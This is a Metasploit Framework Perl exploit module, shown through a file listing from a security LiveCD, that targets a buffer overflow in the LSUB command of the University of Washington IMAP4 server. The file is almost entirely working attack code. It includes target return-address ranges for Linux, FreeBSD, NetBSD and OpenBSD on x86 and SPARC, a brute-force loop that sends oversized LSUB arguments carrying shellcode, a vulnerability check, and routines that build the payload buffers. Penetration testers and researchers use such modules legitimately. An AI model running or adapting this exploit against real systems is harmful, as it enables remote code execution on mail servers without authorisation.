home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / uow_imap4_lsub.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  4.5 KB  |  200 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::uow_imap4_lsub;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16. my $info =
  17.   {
  18.     'Name'  => 'University of Washington IMAP4 LSUB Overflow',
  19.     'Version'  => '$Revision: 1.21 $',
  20.     'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
  21.  
  22.     'Arch'  => [ 'x86', 'sparc' ],
  23.     'OS'    => [ 'bsd', 'linux' ],
  24.     'Priv'  => 0,
  25.  
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 143],
  30.         'USER'  => [1, 'DATA', 'User name'],
  31.         'PASS'  => [1, 'DATA', 'Password'],
  32.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  33.       },
  34.  
  35.     'Payload' =>
  36.       {
  37.         'Space'  => 680,
  38.         'MinNops'=> 400,
  39.         'BadChars'  => "\x00/",
  40.         'Keys'   => ['+findsock', '+inetd'],
  41.       },
  42.  
  43.     'Description'  => Pex::Text::Freeform(qq{
  44.         This exploits a buffer overflow in the LSUB command. An overly long
  45.         argument causes a classic stack buffer overflow.
  46. }),
  47.  
  48.     'Refs'  =>
  49.       [
  50.         ['BID', '1110'],
  51.         ['OSVDB', '12037'],
  52.         ['MIL', '71'],
  53.       ],
  54.  
  55.     'Targets' =>
  56.       [
  57.         [ "Linux / x86 stack bruteforce", 0, 0xbffffdfc, 0xbfa00000, 400, 1064, \&Payloadx86 ],
  58.         [ "FreeBSD / x86 stack bruteforce", 0, 0xbfbffdfc, 0xbf100000, 400, 1064, \&Payloadx86 ],
  59.         [ "Linux+FreeBSD+NetBSD / x86 heap bruteforce", 1, 0x0804d000, 0x081f0000, -400, 1064, \&Payloadx86 ],
  60.  
  61. # These 2 could be consolidated and you'd get 5-6 useless hits on Linux but it's better this way.
  62.         [ "Linux / sun4m stack bruteforce", 0, 0xefffeca0, 0xefa00000, 744, 1104, \&PayloadSPARC ],
  63.         [ "NetBSD / sun4m stack bruteforce", 0, 0xeffffca0, 0xefa00000, 744, 1104, \&PayloadSPARC ],
  64.         [ "OpenBSD / sun4m stack bruteforce", 0, 0xf7fffca0, 0xf7a00000, 744, 1104, \&PayloadSPARC ],
  65.       ],
  66.  
  67.     'Keys'  => ['imap'],
  68.  
  69.     'DisclosureDate' => 'Apr 16 2000',
  70.   };
  71.  
  72. sub new {
  73.     my $class = shift;
  74.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  75.     return($self);
  76. }
  77.  
  78. sub Exploit {
  79.     my $self = shift;
  80.     my $target_idx  = $self->GetVar('TARGET');
  81.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  82.  
  83.     my $target = $self->Targets->[$target_idx];
  84.  
  85.     my $curr_ret;
  86.  
  87.     $self->PrintLine(sprintf("[*] Starting bruteforce mode for target %s.", $target->[0]));
  88.  
  89.     for (
  90.         $curr_ret  = $target->[2];
  91.         ($target->[1] == 0 && $curr_ret >= $target->[3]) || ($target->[1] == 1 && $curr_ret <= $target->[3]);
  92.         $curr_ret -= $target->[4]
  93.       )
  94.     {
  95.         if(!($curr_ret & 0xff) || ($curr_ret & 0xff) == 0x20)
  96.         {
  97.             $curr_ret += 8;
  98.         }
  99.         if(!($curr_ret & 0xff00) || ($curr_ret & 0xff00) == 0x2000)
  100.         {
  101.             $curr_ret -= 0x0100;
  102.         }
  103.  
  104.         my $s = Login($self);
  105.         if($s == -1)
  106.         {
  107.             return;
  108.         }
  109.  
  110.         $self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret));
  111.         $s->Send(sprintf("1 LSUB \"\" {%i}\r\n", $target->[5]));
  112.         $s->Recv(-1);
  113.         $s->Send($target->[6]->($curr_ret, $shellcode) . "\r\n");
  114.  
  115.         $self->Handler($s);
  116.         $s->Close();
  117.         undef($s);
  118.     }
  119.  
  120.     return;
  121. }
  122.  
  123. sub Check {
  124.     my $self = shift;
  125.  
  126.     my $s = Login($self);
  127.     if($s == -1)
  128.     {
  129.         return;
  130.     }
  131.  
  132.     $s->Send("1 LSUB \"\" {1096}\r\n");
  133.     $s->Recv(-1);
  134.     $s->Send(Pex::Text::AlphaNumText(1096) . "\r\n");
  135.     my $reply = $s->Recv(-1);
  136.  
  137.     if(!$reply)
  138.     {
  139.         $self->PrintLine("[*] Vulnerable server.");
  140.         return $self->CheckCode('Confirmed');
  141.     }
  142.  
  143.     $self->PrintLine("[*] Server is probably not vulnerable.");
  144.     return $self->CheckCode('Safe');
  145. }
  146.  
  147. sub Login {
  148.     my $self = shift;
  149.  
  150.     my $user = $self->GetVar('USER');
  151.     my $pass = $self->GetVar('PASS');
  152.  
  153.     my $sock = Msf::Socket::Tcp->new
  154.       (
  155.         'PeerAddr'  => $self->GetVar('RHOST'),
  156.         'PeerPort'  => $self->GetVar('RPORT'),
  157.         'LocalPort' => $self->GetVar('CPORT'),
  158.         'SSL'       => $self->GetVar('SSL'),
  159.       );
  160.     if ($sock->IsError) {
  161.         $self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
  162.         return -1;
  163.     }
  164.  
  165.     $sock->Recv(-1);
  166.     $sock->Send(sprintf("1 LOGIN \"%s\" \"%s\"\r\n", $user, $pass));
  167.     my $reply = $sock->Recv(-1);
  168.     if(!$reply || $reply !~ /1 OK/)
  169.     {
  170.         $self->PrintLine('[*] Authentication failed.');
  171.         return -1;
  172.     }
  173.     undef($reply);
  174.  
  175.     return $sock;
  176. }
  177.  
  178. sub Payloadx86 {
  179.     my $ret = shift;
  180.     my $sc = shift;
  181.  
  182.     my $buf;
  183.  
  184.     # XXX: More precise.
  185.     $buf = $sc . pack("V", $ret) x 96;
  186.  
  187.     return $buf;
  188. }
  189.  
  190. sub PayloadSPARC {
  191.     my $ret = shift;
  192.     my $sc = shift;
  193.  
  194.     my $buf;
  195.  
  196.     $buf = substr($sc, 0, 1032 - 680) . $sc . pack("N", $ret - 32) x 15 . pack("N", $ret) x 3;
  197.  
  198.     return $buf;
  199. }
  200.